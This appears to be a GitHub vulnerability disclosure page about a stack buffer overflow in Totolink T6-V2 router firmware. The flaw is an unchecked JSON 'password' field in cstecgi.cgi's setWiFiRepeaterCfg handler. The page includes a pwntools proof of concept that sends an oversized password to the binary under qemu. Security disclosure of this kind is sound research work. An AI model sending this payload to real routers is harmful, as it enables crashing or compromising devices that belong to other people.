Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
IoT-vuln/Totolink/T6-v2/5.setWiFiRepeaterCfg/
IoT-vuln/Totolink/T6-v2/5.setWiFiRepeaterCfg/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
img
 
 
 
 

Overview

Affected version

T6-V2 V4.1.9cu.5179_B20201015

Vulnerability details

The vulnerability exists in the router's WEB component. /web_cste/cgi-bin/cstecgi.cgi FUN_00413f80 (at address 0x413f80) gets the JSON parameter password, but without checking its length, copies it directly to local variables in the stack, causing stack overflow:

image-20220529105156504

The program gets the JSON parameter encrypt, password, opmode. When encrypt is equal to WEP and opmode is equal to rpt, the program will enter the branch at line 268.

image-20220529105310649

PoC

from pwn import *
import json

data = {
    "topicurl": "setting/setWiFiRepeaterCfg",
    "opmode": "rpt",
    "encrypt": "WEP",
    "password": "A"*0x400,
}

data = json.dumps(data)
print(data)

argv = [
    "qemu-mipsel-static",
    "-g", "1234",
    "-L", "./root/",
    "-E", "CONTENT_LENGTH={}".format(len(data)),
    "-E", "REMOTE_ADDR=192.168.2.1",
    "./cstecgi.cgi"
]

a = process(argv=argv)
a.sendline(data.encode())

a.interactive()